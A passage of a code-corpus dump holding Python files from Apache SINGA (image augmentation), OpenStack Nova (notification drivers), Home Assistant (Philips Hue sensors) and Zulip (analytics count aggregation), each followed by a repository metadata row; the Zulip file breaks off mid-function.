        position(list(str)): left_top, left_bottom, right_top, right_bottom
        and center.
    '''
    width, height = img.size
    if width < patch[0]:
        raise Exception('img size[0] %d is smaller than patch[0]: %d'
                        % (width, patch[0]))
    if height < patch[1]:
        raise Exception('img size[1] %d is smaller than patch[1]: %d'
                        % (height, patch[1]))
    # Top-left corner of the crop box for each supported position.
    corners = {
        'left_top': (0, 0),
        'left_bottom': (0, height - patch[1]),
        'right_top': (width - patch[0], 0),
        'right_bottom': (width - patch[0], height - patch[1]),
        'center': ((width - patch[0]) // 2, (height - patch[1]) // 2),
    }
    if position not in corners:
        raise Exception('position is wrong')
    left, upper = corners[position]
    return img.crop((left, upper, left + patch[0], upper + patch[1]))
def crop_and_resize(img, patch, position):
    '''Crop a max square patch of the input image at given position and resize
    it into given size.
    Args:
        patch(tuple): width, height
        position(list(str)): left, center, right, top, middle, bottom.
    '''
    size = img.size
    if position == 'left':
        left, upper = 0, 0
        right, bottom = size[1], size[1]
    elif position == 'center':
        left, upper = (size[0]-size[1]) // 2, 0
        right, bottom = (size[0]+size[1]) // 2, size[1]
    elif position == 'right':
        left, upper = size[0]-size[1], 0
        right, bottom = size[0], size[1]
    elif position == 'top':
        left, upper = 0, 0
        right, bottom = size[0], size[0]
    elif position == 'middle':
        left, upper = 0, (size[1]-size[0]) // 2
        right, bottom = size[0], (size[1]+size[0]) // 2
    elif position == 'bottom':
        left, upper = 0, size[1]-size[0]
        right, bottom = size[0], size[1]
    else:
        raise Exception('position is wrong')
    box = (left, upper, right, bottom)
    new_img = img.crop(box)
    # Bug fix: resize the cropped square.  Previously this resized the
    # ORIGINAL image (img.resize), silently discarding the crop computed
    # above and returning a distorted full-frame image.
    new_img = new_img.resize(patch, Image.BILINEAR)
    return new_img
def resize(img, small_size):
    '''Scale the image so that its smaller side equals small_size.'''
    width, height = img.size
    if width < height:
        # Width is the smaller side; scale height proportionally.
        target = (small_size, int(small_size * height / width))
    else:
        target = (int(small_size * width / height), small_size)
    return img.resize(target, Image.BILINEAR)
def color_cast(img, offset):
    '''Add a random value from [-offset, offset] to each channel.

    Each of the three RGB channels independently has a 50% chance of
    receiving a uniform random shift; results are clamped to [0, 255].
    '''
    x = np.asarray(img, dtype='uint8')
    # Same random-call sequence as before: one coin flip per channel, then
    # (only when the flip succeeds) one draw for the shift amount.
    cast_value = [0, 0, 0]
    for i in range(3):
        if random.randint(0, 1):
            cast_value[i] = random.randint(-offset, offset)
    # Vectorized replacement for the former per-pixel Python loop: compute
    # in a signed dtype so the addition cannot wrap around in uint8, clamp,
    # then convert back.  Identical output, but runs in C.
    shifted = x.astype(np.int16) + np.asarray(cast_value, dtype=np.int16)
    clipped = np.clip(shifted, 0, 255).astype('uint8')
    return Image.fromarray(clipped, 'RGB')
def enhance(img, scale):
    '''Apply random enhancement for Color,Contrast,Brightness,Sharpness.
    Args:
        scale(float): enhancement degree is from [1-scale, 1+scale]
    '''
    # One coin flip per enhancement type; only winners draw a factor.
    factors = [1.0, 1.0, 1.0, 1.0]
    for i in range(4):
        if random.randint(0, 1):
            factors[i] = random.uniform(1 - scale, 1 + scale)
    # Apply in the fixed order Color, Contrast, Brightness, Sharpness,
    # skipping identity factors.
    enhancer_classes = (ImageEnhance.Color, ImageEnhance.Contrast,
                        ImageEnhance.Brightness, ImageEnhance.Sharpness)
    for factor, enhancer_cls in zip(factors, enhancer_classes):
        if factor != 1.0:
            img = enhancer_cls(img).enhance(factor)
    return img
def flip(img):
    '''Return a horizontally mirrored (left-right) copy of the image.'''
    return img.transpose(Image.FLIP_LEFT_RIGHT)
def flip_down(img):
    '''Return a vertically mirrored (top-bottom) copy of the image.'''
    return img.transpose(Image.FLIP_TOP_BOTTOM)
def get_list_sample(l, sample_size):
    '''Return sample_size randomly chosen items of l in their original order.'''
    chosen_indices = random.sample(range(len(l)), sample_size)
    return [l[i] for i in sorted(chosen_indices)]
class ImageTool(object):
    '''A tool for image augmentation.
    For operations with inplace=True, the returned value is the ImageTool
    instance self, which is for chaining multiple operations; Otherwise, the
    preprocessed images would be returned.
    For operations that has countable pre-processing cases, argument num_case
    could be set to decide the number of pre-processing cases to apply.
    Typically, it is set to 1 for training phases and to the max for test
    phases.
    '''

    def __init__(self):
        # The working list of PIL images all chained operations act on.
        self.imgs = []
        return

    def load(self, path, grayscale=False):
        '''Replace the working list with the single image read from path.'''
        img = load_img(path, grayscale)
        self.imgs = [img]
        return self

    def set(self, imgs):
        '''Replace the working list with the given images.'''
        self.imgs = imgs
        return self

    def append(self, img):
        '''Add one image to the working list.'''
        self.imgs.append(img)
        return self

    def get(self):
        '''Return the current list of images.'''
        return self.imgs

    def num_augmentation(self):
        '''Return the total number of augmentations to each image.

        Not implemented; currently returns None.
        '''
        pass

    def resize_by_range(self, rng, inplace=True):
        '''
        Args:
            rng: a tuple (begin,end), include begin, exclude end
            inplace: inplace imgs or not ( return new_imgs)
        '''
        size_list = list(range(rng[0], rng[1]))
        return self.resize_by_list(size_list, 1, inplace)

    def resize_by_list(self, size_list, num_case=1, inplace=True):
        '''
        Args:
            num_case: num of resize cases, must be <= the length of size_list
            inplace: inplace imgs or not ( return new_imgs)
        '''
        if num_case < 1 or num_case > len(size_list):
            # Error message fixed: the accepted range starts at 1, not 0.
            raise Exception(
                'num_case must be in [1,%d(length of size_list)]' %
                len(size_list))
        new_imgs = []
        for img in self.imgs:
            if num_case == len(size_list):
                small_sizes = size_list
            else:
                # Sample a fresh subset of target sizes for every image.
                small_sizes = get_list_sample(size_list, num_case)
            for small_size in small_sizes:
                new_imgs.append(resize(img, small_size))
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def rotate_by_range(self, rng, inplace=True):
        '''
        Args:
            rng: a tuple (begin,end) in degree, include begin, exclude end
            inplace: inplace imgs or not ( return new_imgs)
        '''
        angle_list = list(range(rng[0], rng[1]))
        return self.rotate_by_list(angle_list, 1, inplace)

    def rotate_by_list(self, angle_list, num_case=1, inplace=True):
        '''
        Args:
            num_case: num of rotate cases, must be <= the length of angle_list
            inplace: inplace imgs or not ( return new_imgs)
        '''
        if num_case < 1 or num_case > len(angle_list):
            raise Exception(
                'num_case must be smaller in [1,%d(length of angle_list)]' %
                len(angle_list))
        new_imgs = []
        for img in self.imgs:
            if num_case == len(angle_list):
                angles = angle_list
            else:
                # Sample a fresh subset of angles for every image.
                angles = get_list_sample(angle_list, num_case)
            for angle in angles:
                new_imgs.append(img.rotate(angle))
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def crop5(self, patch, num_case=1, inplace=True):
        '''Crop at positions from [left_top, left_bottom, right_top,
        right_bottom, and center].
        Args:
            patch(tuple): width and height of the result image.
            num_case: num of cases, must be in [1,5]
            inplace: inplace imgs or not ( return new_imgs)
        '''
        all_positions = [
            "left_top",
            "left_bottom",
            "right_top",
            "right_bottom",
            "center"]
        if num_case > 5 or num_case < 1:
            raise Exception('num_case must be in [1,5]')
        new_imgs = []
        for img in self.imgs:
            if num_case < 5:
                # Bug fix: sample into a separate variable.  The old code
                # overwrote the candidate list itself, so every image after
                # the first sampled from an already-shrunk position pool.
                positions = get_list_sample(all_positions, num_case)
            else:
                positions = all_positions
            for position in positions:
                new_imgs.append(crop(img, patch, position))
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def crop3(self, patch, num_case=1, inplace=True):
        '''Crop a max square patch of the input image at given position and
        scale it into given size.
        According to img size, crop position could be either
        (left, center, right) or (top, middle, bottom).
        Args:
            patch(tuple): the width and height the output image
            num_case: num of cases, must be in [1,3]
            inplace: inplace imgs or not ( return new_imgs)
        '''
        if not patch[0] == patch[1]:
            raise Exception('patch must be a square')
        if num_case > 3 or num_case < 1:
            raise Exception('num_case must be in [1,3]')
        positions_horizental = ["left", "center", "right"]
        positions_vertical = ["top", "middle", "bottom"]
        new_imgs = []
        for img in self.imgs:
            # Landscape images crop along the width, portrait along the height.
            size = img.size
            if size[0] > size[1]:
                candidates = positions_horizental
            else:
                candidates = positions_vertical
            if num_case < 3:
                positions = get_list_sample(candidates, num_case)
            else:
                positions = candidates
            for position in positions:
                new_imgs.append(crop_and_resize(img, patch, position))
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def crop8(self, patch, num_case=1, inplace=True):
        '''This is a union of patch_5 and patch_and_scale.
        You can follow this example to union any num of cases of imgtool methods
        '''
        patch5 = 5
        patch3 = 3
        if num_case < 1 or num_case > patch5 + patch3:
            # Error message fixed: the accepted range starts at 1, not 0.
            raise Exception(
                'num_case must be in [1,%d]' % (patch5+patch3))
        if num_case == patch5 + patch3:
            count = patch5
        else:
            # Randomly split the requested cases between crop5 and crop3.
            sample_list = list(range(0, patch5 + patch3))
            samples = get_list_sample(sample_list, num_case)
            count = sum(1 for s in samples if s < patch5)
        new_imgs = []
        if count > 0:
            new_imgs += self.crop5(patch, count, False)
        if num_case-count > 0:
            new_imgs += self.crop3(patch, num_case-count, False)
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def random_crop(self, patch, inplace=True):
        '''Crop the image at random offset to get a patch of the given size.
        Args:
            patch(tuple): width and height of the patch
            inplace(Boolean): replace the internal images list with the patches
                if True; otherwise, return the patches.
        '''
        new_imgs = []
        for img in self.imgs:
            assert img.size[0] >= patch[0] and img.size[1] >= patch[1],\
                'img size (%d, %d), patch size (%d, %d)' % \
                (img.size[0], img.size[1], patch[0], patch[1])
            left_offset = random.randint(0, img.size[0] - patch[0])
            top_offset = random.randint(0, img.size[1] - patch[1])
            box = (left_offset, top_offset,
                   left_offset + patch[0], top_offset + patch[1])
            new_imgs.append(img.crop(box))
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def random_crop_resize(self, patch, inplace=True):
        ''' Crop of the image at a random size between 0.08 to 1 of input image
        and random aspect ratio between 3/4 to 4/3.
        This crop is then resized to the given patch size.
        Args:
            patch(tuple): width and height of the patch
            inplace(Boolean): replace the internal images list with the patches
                if True; otherwise, return the patches.
        '''
        new_imgs = []
        for img in self.imgs:
            area = img.size[0]*img.size[1]
            img_resized = None
            # Try up to 10 random boxes; fall back to a plain resize when no
            # sampled box fits inside the image.
            for attempt in range(10):
                target_area = random.uniform(0.08, 1.0) * area
                aspect_ratio = random.uniform(3. / 4, 4. / 3)
                crop_x = int(round(math.sqrt(target_area * aspect_ratio)))
                crop_y = int(round(math.sqrt(target_area / aspect_ratio)))
                if img.size[0] > crop_x and img.size[1] > crop_y:
                    left_offset = random.randint(0, img.size[0] - crop_x)
                    top_offset = random.randint(0, img.size[1] - crop_y)
                    box = (left_offset, top_offset, left_offset + crop_x,
                           top_offset + crop_y)
                    img_croped = img.crop(box)
                    img_resized = img_croped.resize(patch, Image.BILINEAR)
                    break
            if img_resized is None:
                img_resized = img.resize(patch, Image.BILINEAR)
            new_imgs.append(img_resized)
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def flip(self, num_case=1, inplace=True):
        '''Randomly flip a img left to right.
        Args:
            num_case: num of cases, must be in {1,2}; if 2, then add the orignal
                and flipped img
            inplace: inplace imgs or not (return new_imgs)
        '''
        new_imgs = []
        for img in self.imgs:
            if num_case == 1:
                # Flip with probability 0.5, otherwise keep the original.
                if random.randint(0, 1):
                    new_imgs.append(flip(img))
                else:
                    new_imgs.append(img)
            elif num_case == 2:
                new_imgs.append(flip(img))
                new_imgs.append(img)
            else:
                # Error message fixed: only 1 and 2 are accepted.
                raise Exception('num_case must be in [1,2]')
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def flip_down(self, num_case=1, inplace=True):
        '''Randomly flip a img top to bottom.
        Args:
            num_case: num of cases, must be in {1,2}; if 2, then add the orignal
                and flip_down img
            inplace: inplace imgs or not (return new_imgs)
        '''
        new_imgs = []
        for img in self.imgs:
            if num_case == 1:
                # Flip with probability 0.5, otherwise keep the original.
                if random.randint(0, 1):
                    new_imgs.append(flip_down(img))
                else:
                    new_imgs.append(img)
            elif num_case == 2:
                new_imgs.append(flip_down(img))
                new_imgs.append(img)
            else:
                # Error message fixed: only 1 and 2 are accepted.
                raise Exception('num_case must be in [1,2]')
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def color_cast(self, offset=20, inplace=True):
        '''Add a random value from [-offset, offset] to each channel
        Args:
            offset: cast offset, >0 and <255
            inplace: inplace imgs or not ( return new_imgs)
        '''
        if offset < 0 or offset > 255:
            raise Exception('offset must be >0 and <255')
        new_imgs = [color_cast(img, offset) for img in self.imgs]
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs

    def enhance(self, scale=0.2, inplace=True):
        '''Apply random enhancement for Color,Contrast,Brightness,Sharpness.
        Args:
            scale(float): enhancement degree is from [1-scale, 1+scale]
            inplace: inplace imgs or not ( return new_imgs)
        '''
        new_imgs = [enhance(img, scale) for img in self.imgs]
        if inplace:
            self.imgs = new_imgs
            return self
        else:
            return new_imgs
if __name__ == '__main__':
    # Demo/smoke test: augment input.png into several variants and save each.
    tool = ImageTool()
    imgs = tool.load('input.png').\
        resize_by_list([112]).crop5((96, 96), 5).enhance().flip().get()
    for idx, img in enumerate(imgs):
        img.save('%d.png' % idx)
| kaiping/incubator-singa | python/singa/image_tool.py | Python | apache-2.0 | 19,335 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import log as logging
from nova import utils
from nova.exception import ClassNotFound
flags.DEFINE_multistring('list_notifier_drivers',
['nova.notifier.no_op_notifier'],
'List of drivers to send notifications')
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.notifier.list_notifier')
drivers = None
class ImportFailureNotifier(object):
    """Noisily re-raises some exception over-and-over when notify is called.

    Used as a placeholder for a notification driver that failed to import,
    so a misconfigured driver is loud rather than silently missing.
    """

    def __init__(self, exception):
        # The import error captured when the real driver failed to load.
        self.exception = exception

    def notify(self, message):
        # Surface the original import failure on every notification attempt.
        raise self.exception
def _get_drivers():
    """Instantiates and returns drivers based on the flag values.

    The list is built once and cached in the module-level ``drivers``
    global; _reset_drivers() clears the cache.
    """
    global drivers
    if not drivers:
        loaded = []
        for driver_name in FLAGS.list_notifier_drivers:
            try:
                loaded.append(utils.import_object(driver_name))
            except ClassNotFound as e:
                # Keep a placeholder that re-raises the import error so the
                # misconfiguration shows up at notify() time.
                loaded.append(ImportFailureNotifier(e))
        drivers = loaded
    return drivers
def notify(message):
    """Passes notification to multiple notifiers in a list.

    A driver that raises is logged and skipped; the remaining drivers
    still receive the message.
    """
    for driver in _get_drivers():
        try:
            driver.notify(message)
        except Exception as e:
            # NOTE: the message is %-formatted against locals() before being
            # handed to gettext, so both 'e' and 'driver' must stay in scope
            # under exactly these names.
            LOG.exception(_("Problem '%(e)s' attempting to send to "
                            "notification driver %(driver)s." % locals()))
def _reset_drivers():
    """Used by unit tests to reset the drivers."""
    global drivers
    # Force _get_drivers() to re-read FLAGS on its next call.
    drivers = None
| 30loops/nova | nova/notifier/list_notifier.py | Python | apache-2.0 | 2,145 |
"""Support for the Philips Hue sensors as a platform."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
from aiohue import AiohueException, Unauthorized
from aiohue.v1.sensors import TYPE_ZLL_PRESENCE
import async_timeout
from homeassistant.components.sensor import SensorStateClass
from homeassistant.core import callback
from homeassistant.helpers import debounce, entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from ..const import REQUEST_REFRESH_DELAY
from .helpers import remove_devices
from .hue_event import EVENT_CONFIG_MAP
from .sensor_device import GenericHueDevice
SENSOR_CONFIG_MAP: dict[str, Any] = {}
LOGGER = logging.getLogger(__name__)
def _device_id(aiohue_sensor):
# Work out the shared device ID, as described below
device_id = aiohue_sensor.uniqueid
if device_id and len(device_id) > 23:
device_id = device_id[:23]
return device_id
class SensorManager:
    """Class that handles registering and updating Hue sensor entities.
    Intended to be a singleton.
    """
    # Polling interval for the shared DataUpdateCoordinator.
    SCAN_INTERVAL = timedelta(seconds=5)
    def __init__(self, bridge):
        """Initialize the sensor manager."""
        self.bridge = bridge
        # Maps platform name -> async_add_entities callback, populated by
        # async_register_component() as each platform finishes setup.
        self._component_add_entities = {}
        # uniqueid -> sensor entity created so far.
        self.current = {}
        # uniqueid -> event-generator object created so far.
        self.current_events = {}
        self._enabled_platforms = ("binary_sensor", "sensor")
        self.coordinator = DataUpdateCoordinator(
            bridge.hass,
            LOGGER,
            name="sensor",
            update_method=self.async_update_data,
            update_interval=self.SCAN_INTERVAL,
            request_refresh_debouncer=debounce.Debouncer(
                bridge.hass, LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
            ),
        )
    async def async_update_data(self):
        """Update sensor data."""
        try:
            # Hard 4-second cap on the bridge round-trip.
            async with async_timeout.timeout(4):
                return await self.bridge.async_request_call(
                    self.bridge.api.sensors.update
                )
        except Unauthorized as err:
            await self.bridge.handle_unauthorized_error()
            raise UpdateFailed("Unauthorized") from err
        except AiohueException as err:
            raise UpdateFailed(f"Hue error: {err}") from err
    async def async_register_component(self, platform, async_add_entities):
        """Register async_add_entities methods for components."""
        self._component_add_entities[platform] = async_add_entities
        # Only start polling once every enabled platform has registered.
        if len(self._component_add_entities) < len(self._enabled_platforms):
            LOGGER.debug("Aborting start with %s, waiting for the rest", platform)
            return
        # We have all components available, start the updating.
        self.bridge.reset_jobs.append(
            self.coordinator.async_add_listener(self.async_update_items)
        )
        await self.coordinator.async_refresh()
    @callback
    def async_update_items(self):
        """Update sensors from the bridge."""
        api = self.bridge.api.sensors
        if len(self._component_add_entities) < len(self._enabled_platforms):
            return
        to_add = {}
        primary_sensor_devices = {}
        current = self.current
        # Physical Hue motion sensors present as three sensors in the API: a
        # presence sensor, a temperature sensor, and a light level sensor. Of
        # these, only the presence sensor is assigned the user-friendly name
        # that the user has given to the device. Each of these sensors is
        # linked by a common device_id, which is the first twenty-three
        # characters of the unique id (then followed by a hyphen and an ID
        # specific to the individual sensor).
        #
        # To set up neat values, and assign the sensor entities to the same
        # device, we first, iterate over all the sensors and find the Hue
        # presence sensors, then iterate over all the remaining sensors -
        # finding the remaining ones that may or may not be related to the
        # presence sensors.
        for item_id in api:
            if api[item_id].type != TYPE_ZLL_PRESENCE:
                continue
            primary_sensor_devices[_device_id(api[item_id])] = api[item_id]
        # Iterate again now we have all the presence sensors, and add the
        # related sensors with nice names where appropriate.
        for item_id in api:
            uniqueid = api[item_id].uniqueid
            # Skip anything we already created an entity or event for.
            if current.get(uniqueid, self.current_events.get(uniqueid)) is not None:
                continue
            sensor_type = api[item_id].type
            # Check for event generator devices
            event_config = EVENT_CONFIG_MAP.get(sensor_type)
            if event_config is not None:
                base_name = api[item_id].name
                name = event_config["name_format"].format(base_name)
                new_event = event_config["class"](api[item_id], name, self.bridge)
                self.bridge.hass.async_create_task(
                    new_event.async_update_device_registry()
                )
                self.current_events[uniqueid] = new_event
            sensor_config = SENSOR_CONFIG_MAP.get(sensor_type)
            if sensor_config is None:
                continue
            base_name = api[item_id].name
            # Prefer the user-assigned name carried by the device's presence
            # sensor, when one exists.
            primary_sensor = primary_sensor_devices.get(_device_id(api[item_id]))
            if primary_sensor is not None:
                base_name = primary_sensor.name
            name = sensor_config["name_format"].format(base_name)
            current[uniqueid] = sensor_config["class"](
                api[item_id], name, self.bridge, primary_sensor=primary_sensor
            )
            to_add.setdefault(sensor_config["platform"], []).append(current[uniqueid])
        # Clean up entities whose sensors disappeared from the bridge.
        self.bridge.hass.async_create_task(
            remove_devices(
                self.bridge,
                [value.uniqueid for value in api.values()],
                current,
            )
        )
        for platform, value in to_add.items():
            self._component_add_entities[platform](value)
class GenericHueSensor(GenericHueDevice, entity.Entity):
    """Representation of a Hue sensor."""
    # Updates are pushed by the shared DataUpdateCoordinator, so Home
    # Assistant must not poll this entity.
    should_poll = False
    @property
    def available(self):
        """Return if sensor is available."""
        return self.bridge.sensor_manager.coordinator.last_update_success and (
            self.allow_unreachable
            # remotes like Hue Tap (ZGPSwitchSensor) have no _reachability_
            or self.sensor.config.get("reachable", True)
        )
    @property
    def state_class(self):
        """Return the state class of this entity, from STATE_CLASSES, if any."""
        return SensorStateClass.MEASUREMENT
    async def async_added_to_hass(self):
        """When entity is added to hass."""
        await super().async_added_to_hass()
        # Re-render state whenever the coordinator has fresh data; the
        # listener is detached automatically when the entity is removed.
        self.async_on_remove(
            self.bridge.sensor_manager.coordinator.async_add_listener(
                self.async_write_ha_state
            )
        )
    async def async_update(self):
        """Update the entity.
        Only used by the generic entity update service.
        """
        await self.bridge.sensor_manager.coordinator.async_request_refresh()
class GenericZLLSensor(GenericHueSensor):
    """Representation of a Hue-brand, physical sensor.

    ZLL (ZigBee Light Link) sensors are battery powered, so the battery
    level is exposed as an extra state attribute.
    """

    @property
    def extra_state_attributes(self):
        """Return the device state attributes."""
        attributes = {"battery_level": self.sensor.battery}
        return attributes
| home-assistant/home-assistant | homeassistant/components/hue/v1/sensor_base.py | Python | apache-2.0 | 7,575 |
import logging
import time
from collections import OrderedDict, defaultdict
from datetime import datetime, timedelta
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
from django.conf import settings
from django.db import connection
from django.db.models import F
from psycopg2.sql import SQL, Composable, Identifier, Literal
from analytics.models import (
BaseCount,
FillState,
InstallationCount,
RealmCount,
StreamCount,
UserCount,
installation_epoch,
last_successful_fill,
)
from zerver.lib.logging_util import log_to_file
from zerver.lib.timestamp import ceiling_to_day, ceiling_to_hour, floor_to_hour, verify_UTC
from zerver.models import (
Message,
Realm,
RealmAuditLog,
Stream,
UserActivityInterval,
UserProfile,
models,
)
## Logging setup ##
logger = logging.getLogger('zulip.management')
log_to_file(logger, settings.ANALYTICS_LOG_PATH)
# You can't subtract timedelta.max from a datetime, so use this instead
TIMEDELTA_MAX = timedelta(days=365*1000)
## Class definitions ##
class CountStat:
    """Descriptor for one analytics statistic: what to compute (the
    data_collector), how often (frequency), and over what window (interval).
    """
    HOUR = 'hour'
    DAY = 'day'
    FREQUENCIES = frozenset([HOUR, DAY])

    def __init__(self, property: str, data_collector: 'DataCollector', frequency: str,
                 interval: Optional[timedelta]=None) -> None:
        self.property = property
        self.data_collector = data_collector
        # might have to do something different for bitfields
        if frequency not in self.FREQUENCIES:
            raise AssertionError(f"Unknown frequency: {frequency}")
        self.frequency = frequency
        if interval is not None:
            self.interval = interval
        else:
            # Default the aggregation window to one frequency period.
            self.interval = (timedelta(hours=1) if frequency == CountStat.HOUR
                             else timedelta(days=1))

    def __str__(self) -> str:
        return f"<CountStat: {self.property}>"
class LoggingCountStat(CountStat):
    """A stat whose rows are written directly by application code at event
    time, so no pull function is needed.
    """

    def __init__(self, property: str, output_table: Type[BaseCount], frequency: str) -> None:
        super().__init__(property, DataCollector(output_table, None), frequency)
class DependentCountStat(CountStat):
    """A stat that must not be filled past the fill state of the stats it
    depends on (named by their property strings).
    """

    def __init__(self, property: str, data_collector: 'DataCollector', frequency: str,
                 interval: Optional[timedelta] = None, dependencies: Sequence[str] = ()) -> None:
        CountStat.__init__(self, property, data_collector, frequency, interval=interval)
        # Default changed from a shared mutable [] to an immutable ();
        # callers only iterate this, so the interface is unchanged.
        self.dependencies = dependencies
class DataCollector:
    """Pairs the output *Count table with an optional SQL pull function."""

    def __init__(self, output_table: Type[BaseCount],
                 pull_function: Optional[Callable[[str, datetime, datetime, Optional[Realm]], int]]) -> None:
        # pull_function is None for LoggingCountStats, whose rows are
        # written by application code rather than pulled from other tables.
        self.output_table = output_table
        self.pull_function = pull_function
## CountStat-level operations ##
def process_count_stat(stat: CountStat, fill_to_time: datetime,
                       realm: Optional[Realm]=None) -> None:
    """Advance stat's FillState period by period up to fill_to_time,
    recovering first from any previously interrupted fill.
    """
    # TODO: The realm argument is not yet supported, in that we don't
    # have a solution for how to update FillState if it is passed. It
    # exists solely as partial plumbing for when we do fully implement
    # doing single-realm analytics runs for use cases like data import.
    #
    # Also, note that for the realm argument to be properly supported,
    # the CountStat object passed in needs to have come from
    # E.g. get_count_stats(realm), i.e. have the realm_id already
    # entered into the SQL query defined by the CountState object.
    if stat.frequency == CountStat.HOUR:
        time_increment = timedelta(hours=1)
    elif stat.frequency == CountStat.DAY:
        time_increment = timedelta(days=1)
    else:
        raise AssertionError(f"Unknown frequency: {stat.frequency}")
    verify_UTC(fill_to_time)
    if floor_to_hour(fill_to_time) != fill_to_time:
        raise ValueError(f"fill_to_time must be on an hour boundary: {fill_to_time}")
    fill_state = FillState.objects.filter(property=stat.property).first()
    if fill_state is None:
        # First run for this stat: start filling from the installation epoch.
        currently_filled = installation_epoch()
        fill_state = FillState.objects.create(property=stat.property,
                                              end_time=currently_filled,
                                              state=FillState.DONE)
        logger.info("INITIALIZED %s %s", stat.property, currently_filled)
    elif fill_state.state == FillState.STARTED:
        # A previous run died mid-period; delete its partial rows and rewind.
        logger.info("UNDO START %s %s", stat.property, fill_state.end_time)
        do_delete_counts_at_hour(stat, fill_state.end_time)
        currently_filled = fill_state.end_time - time_increment
        do_update_fill_state(fill_state, currently_filled, FillState.DONE)
        logger.info("UNDO DONE %s", stat.property)
    elif fill_state.state == FillState.DONE:
        currently_filled = fill_state.end_time
    else:
        raise AssertionError(f"Unknown value for FillState.state: {fill_state.state}.")
    if isinstance(stat, DependentCountStat):
        # Never fill past the point any dependency has been filled to.
        for dependency in stat.dependencies:
            dependency_fill_time = last_successful_fill(dependency)
            if dependency_fill_time is None:
                logger.warning("DependentCountStat %s run before dependency %s.",
                               stat.property, dependency)
                return
            fill_to_time = min(fill_to_time, dependency_fill_time)
    currently_filled = currently_filled + time_increment
    while currently_filled <= fill_to_time:
        logger.info("START %s %s", stat.property, currently_filled)
        start = time.time()
        # Mark STARTED before computing so a crash here is detectable and
        # undoable on the next run (see the UNDO branch above).
        do_update_fill_state(fill_state, currently_filled, FillState.STARTED)
        do_fill_count_stat_at_hour(stat, currently_filled, realm)
        do_update_fill_state(fill_state, currently_filled, FillState.DONE)
        end = time.time()
        currently_filled = currently_filled + time_increment
        logger.info("DONE %s (%dms)", stat.property, (end-start)*1000)
def do_update_fill_state(fill_state: FillState, end_time: datetime, state: int) -> None:
    """Record fill progress for a stat: the last processed end_time and
    whether that hour is DONE or only STARTED (i.e. mid-write)."""
    fill_state.end_time = end_time
    fill_state.state = state
    fill_state.save()
# We assume end_time is valid (e.g. is on a day or hour boundary as appropriate)
# and is timezone aware. It is the caller's responsibility to enforce this!
def do_fill_count_stat_at_hour(stat: CountStat, end_time: datetime, realm: Optional[Realm]=None) -> None:
    """Compute and store one bucket of data (ending at `end_time`) for `stat`.

    LoggingCountStats accumulate their detail rows at event time, so for
    those only the aggregation step runs; for pull-based stats, the stat's
    pull_function is first invoked over [end_time - interval, end_time).
    """
    if not isinstance(stat, LoggingCountStat):
        pull_started = time.time()
        pull = stat.data_collector.pull_function
        assert pull is not None
        row_count = pull(stat.property, end_time - stat.interval, end_time, realm)
        logger.info("%s run pull_function (%dms/%sr)",
                    stat.property, (time.time() - pull_started) * 1000, row_count)
    do_aggregate_to_summary_table(stat, end_time, realm)
def do_delete_counts_at_hour(stat: CountStat, end_time: datetime) -> None:
    """Delete every row recorded for `stat` at exactly `end_time`.

    Used to undo a partially completed (STARTED) fill.  For a
    LoggingCountStat the rows in its output table are the data of record,
    so only the derived aggregate tables are cleared; for a regular stat
    all four tables are cleared.
    """
    if isinstance(stat, LoggingCountStat):
        InstallationCount.objects.filter(property=stat.property, end_time=end_time).delete()
        if stat.data_collector.output_table in [UserCount, StreamCount]:
            RealmCount.objects.filter(property=stat.property, end_time=end_time).delete()
    else:
        for model in (UserCount, StreamCount, RealmCount, InstallationCount):
            model.objects.filter(property=stat.property, end_time=end_time).delete()
def do_aggregate_to_summary_table(stat: CountStat, end_time: datetime,
                                  realm: Optional[Realm]=None) -> None:
    """Roll already-written detail rows for `stat` at `end_time` up into the
    summary tables.

    UserCount/StreamCount rows are summed into RealmCount (preserving
    subgroup), and — only when aggregating across all realms (realm is
    None) — RealmCount is then summed into InstallationCount.
    """
    cursor = connection.cursor()

    # Aggregate into RealmCount
    output_table = stat.data_collector.output_table
    # realm_clause is spliced into the SQL (not a query param) because it is
    # a SQL fragment, not a value; Literal() handles safe quoting of the id.
    if realm is not None:
        realm_clause = SQL("AND zerver_realm.id = {}").format(Literal(realm.id))
    else:
        realm_clause = SQL("")

    if output_table in (UserCount, StreamCount):
        realmcount_query = SQL("""
            INSERT INTO analytics_realmcount
                (realm_id, value, property, subgroup, end_time)
            SELECT
                zerver_realm.id, COALESCE(sum({output_table}.value), 0), %(property)s,
                {output_table}.subgroup, %(end_time)s
            FROM zerver_realm
            JOIN {output_table}
            ON
                zerver_realm.id = {output_table}.realm_id
            WHERE
                {output_table}.property = %(property)s AND
                {output_table}.end_time = %(end_time)s
                {realm_clause}
            GROUP BY zerver_realm.id, {output_table}.subgroup
        """).format(
            output_table=Identifier(output_table._meta.db_table),
            realm_clause=realm_clause,
        )
        start = time.time()
        cursor.execute(realmcount_query, {
            'property': stat.property,
            'end_time': end_time,
        })
        end = time.time()
        logger.info(
            "%s RealmCount aggregation (%dms/%sr)",
            stat.property, (end - start) * 1000, cursor.rowcount,
        )

    if realm is None:
        # Aggregate into InstallationCount. Only run if we just
        # processed counts for all realms.
        #
